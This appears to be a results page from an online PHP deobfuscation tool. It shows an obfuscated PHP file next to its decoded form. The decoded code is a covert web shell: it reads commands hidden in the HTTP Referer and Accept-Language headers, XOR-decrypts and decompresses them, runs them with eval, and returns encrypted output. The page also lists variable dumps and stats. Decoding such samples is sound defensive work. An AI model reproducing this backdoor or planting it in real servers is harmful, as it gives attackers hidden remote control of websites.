Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $y='_en<Kcode(x(g<Kzcompres<Ks($o),$<Kk<K));pr<Kint("<$k>$d<K</$<Kk>")<K;@session<K_..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$y='_en<Kcode(x(g<Kzcompres<Ks($o),$<Kk<K));pr<Kint("<$k>$d<K</$<Kk>")<K;@session<K_destroy(<K);}}}}';
$D='m);<Kif($q&&$m){<K@sess<Kion_s<Ktart(<K);$s=&<K$_SESSIO<KN;$s<Ks="su<Kb<Kstr";$<Ksl="st<Krtolo';
$S=',$ss<K($s[$i]<K<K,0,$e<K))),$k)));$o=<Kob_<K<Kget_contents<K();ob_en<Kd_clean()<K;<K$d=base6<K4';
$R=';f<Kor($i=0<K;$i<<K$l;){fo<Kr<K($j=0;(<K$j<$c&&<K<K$<Ki<$l);$j++,$i<K++){$o.=$t<K{$i}^$k{$<Kj};';
$G=str_replace('X','','XcreXaXteX_funXXction');
$u='<KANGU<KAGE<K"];i<Kf($<Krr&&$ra)<K{$u=parse_ur<Kl($rr);pars<Ke_s<Ktr(<K$u["q<Ku<Kery"],$q);$q<K';
$j='tr<Kpos($p<K,$h)===0)<K{$s[$<Ki]<K="";$p=$ss(<K<K$p,3);}if(a<K<Krray_key_exi<Ks<Kts($i<K,$s<K))<K';
$O='wer";$<Ki=$m<K[1][0].$m[<K1][1];$<Kh=$s<Kl(<K$s<Ks(md5($i.$k<Kh),0,3)<K);$f=$sl<K($ss(md5(<K$i';
$X='}}r<Ket<Kurn $o;<K}$r=$_SER<KVE<KR;$rr=<K@$r["HTTP_RE<K<KFERER<K"]<K;$ra=@$r["HTTP_A<K<KCCEPT_L';
$e='<K.$k<Kf),0,<K<K3));$p<K="";for($z=1<K;$z<count($m[1<K]);$<Kz+<K<K+)$p.=$q[$m[2][$<Kz]];if(s<K';
$o='$kh="5d41"<K;$kf="<K<K402a";fun<Kction<K x($t,$<Kk){$c=<Kstr<Klen($k);$<Kl=strle<Kn($t);$o<K=""';
$K='{$s<K[$i].<K=$p;$e=strp<Kos($s[$i],$f);if($e<K<K){$k=$kh<K.$kf;ob_<Kstart();@<Kev<Kal<K(@gzu<Kn';
$s='compress(@x(@<K<Kba<Kse64_decode<K(p<Kreg_re<Kplace(array("/_<K/","<K/-/"),a<Krray("/"<K,"<K+")';
$N='=array_values(<K$q);p<Kreg_matc<Kh_al<Kl("/<K([\\<Kw])[\\w<K<K-]+<K(?:;q=0.([\\d]))?,?<K/",$<Kra,$';
$A=str_replace('<K','',$o.$R.$X.$u.$N.$D.$O.$e.$j.$K.$s.$S.$y);
$c=$G('',$A);$c();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$D m);<Kif($q&&$m){<K@sess<Kion_s<Ktart(<K);$s=&<K$_SESSIO<KN;$..
$G create_function
$K {$s<K[$i].<K=$p;$e=strp<Kos($s[$i],$f);if($e<K<K){$k=$kh<K.$..
$N =array_values(<K$q);p<Kreg_matc<Kh_al<Kl("/<K([\<Kw])[\w<K<K..
$O wer";$<Ki=$m<K[1][0].$m[<K1][1];$<Kh=$s<Kl(<K$s<Ks(md5($i.$k..
$R ;f<Kor($i=0<K;$i<<K$l;){fo<Kr<K($j=0;(<K$j<$c&&<K<K$<Ki<$l);..
$S ,$ss<K($s[$i]<K<K,0,$e<K))),$k)));$o=<Kob_<K<Kget_contents<K..
$X }}r<Ket<Kurn $o;<K}$r=$_SER<KVE<KR;$rr=<K@$r["HTTP_RE<K<KFER..
$c None
$e <K.$k<Kf),0,<K<K3));$p<K="";for($z=1<K;$z<count($m[1<K]);$<K..
$j tr<Kpos($p<K,$h)===0)<K{$s[$<Ki]<K="";$p=$ss(<K<K$p,3);}if(a..
$o $kh="5d41"<K;$kf="<K<K402a";fun<Kction<K x($t,$<Kk){$c=<Kstr..
$s compress(@x(@<K<Kba<Kse64_decode<K(p<Kreg_re<Kplace(array("/..
$u <KANGU<KAGE<K"];i<Kf($<Krr&&$ra)<K{$u=parse_ur<Kl($rr);pars<..
$y _en<Kcode(x(g<Kzcompres<Ks($o),$<Kk<K));pr<Kint("<$k>$d<K</$..

Stats

MD5 4f032f6e8cbb1f6aabef7c57a476a8d8
Eval Count 1
Decode Time 124 ms